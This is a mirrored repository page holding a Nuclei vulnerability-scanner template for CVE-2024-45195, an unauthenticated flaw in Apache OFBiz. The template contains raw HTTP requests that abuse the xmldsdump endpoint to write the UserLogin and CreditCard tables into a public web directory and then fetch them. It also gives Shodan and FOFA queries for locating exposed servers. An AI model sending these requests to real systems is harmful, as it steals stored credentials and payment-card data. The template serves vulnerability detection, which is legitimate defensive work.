daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-45195.yaml

63 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2024-45195
info:
name: Apache OFBiz - Remote Code Execution
author: DhiyaneshDK
severity: high
description: |
Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server
remediation: |
Users are recommended to upgrade to version 18.12.16, which fixes the issue.
reference:
- https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
- https://ofbiz.apache.org/download.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-45195
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-45195
cwe-id: CWE-425
epss-score: 0.00045
epss-percentile: 0.16342
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: ofbiz
shodan-query:
- ofbiz.visitor=
- http.html:"ofbiz"
fofa-query:
- app="apache_ofbiz"
- body="ofbiz"
tags: cve,cve2024,apache,ofbiz,rce,instrusive
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard
- |
GET /common/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "<?xml version="
- "entity-engine-xml"
condition: and
- type: word
part: content_type_2
words:
- "text/plain"
# digest: 490a00463044022077a73b01c947ad3e7541beb49444c324251e8b9730dc1deadd4fd40eec8459a802204dce272e5fffe0008853f9beeb9967a3c73e5800f7c9b63368714eefc6d9d66e:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink